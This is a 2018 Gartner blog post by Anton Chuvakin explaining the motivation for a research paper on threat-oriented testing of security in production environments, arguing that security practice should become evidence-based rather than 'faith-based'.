Gartner Blog Network


Why This Paper? or Mysteries of Testing Security!

by Anton Chuvakin  |  June 12, 2018  |  Comments Off on Why This Paper? or Mysteries of Testing Security!

Some of you have been wondering why we decided to embark on a project that resulted in our paper called “Threat-Oriented Approaches to Test Security in Production” [Gartner GTP access required].

For sure, the same research project also produced our world-famous BAS paper, but this one is a more traditional here-is-a-new-tech-and-how-to-use-it kinda document.

The testing paper, as we called it during development, is different. While some may consider it “a WHAT paper” (as opposed to “HOW papers” such as our SIEM, VM or MSSP guidance documents), it does seek to popularize the concept and practice of testing security in production.

Look, we all secretly know that much / most of deployed security technologies and developed security processes are “faith-based” (or “luck-based” for those militant atheists). Some may counter that they are “risk-based” in their enlightened organization, but I’d counter-counter that your risks are also very often “faith-based” themselves. And even if you somehow “know” your risks, security technology and practice real-world effectiveness is so uncertain in most cases as to be purely an article of faith.

For god’s sake, after a quarter of a century of trying, we cannot agree on how to test anti-malware. In a lab. In a vacuum. With an unlimited supply of vacuum-breathing lab rats. Also, we debate whether changing passwords every 90 days has security value. For 50 years. With no resolution. In sight.

This is the world we live in. This is the world we’ve lived in since the dawn of the infosec era in the late 1980s. Calling it “cyber” does not help. So, let’s just quietly accept it and then seek to change it! Our paperis our attempt to initiate such change.

We think security professionals need to TEST MORE and BELIEVE LESS! You may say that security people are a skeptical bunch naturally, but – look – see those shiny security appliances? Who do you think bought them?!

So, we scoped the research to cover “tests used to verify the current status of production environments, obtaining evidence directly from them.” Also, we look at “tests are threat-focused, that is, they use methods or look for data used by threat actors during their attacks.” We believe that this is a good way to test security and to make it more fact-based, or evidence-based. This is bigger than BAS, and not the same as pentesting, even though both play a role.

There you have it! Now go and Test More! Gather data!! Make security fact-based!!! [again? no, not again – it never really was :-)]

The paper in question:

Related blog posts:

Category: security  simulation  testing  

Anton Chuvakin
Research VP and Distinguished Analyst
5+ years with Gartner
17 years IT industry

Anton Chuvakin is a Research VP and Distinguished Analyst at Gartner's GTP Security and Risk Management group. Before Mr. Chuvakin joined Gartner, his job responsibilities included security product management, evangelist… Read Full Bio




Comments are closed

Comments or opinions expressed on this blog are those of the individual contributors only, and do not necessarily represent the views of Gartner, Inc. or its management. Readers may copy and redistribute blog postings on other blogs, or otherwise for private, non-commercial or journalistic purposes, with attribution to Gartner. This content may not be used for any other purposes in any other formats or media. The content on this blog is provided on an "as-is" basis. Gartner shall not be liable for any damages whatsoever arising out of the content or use of this blog.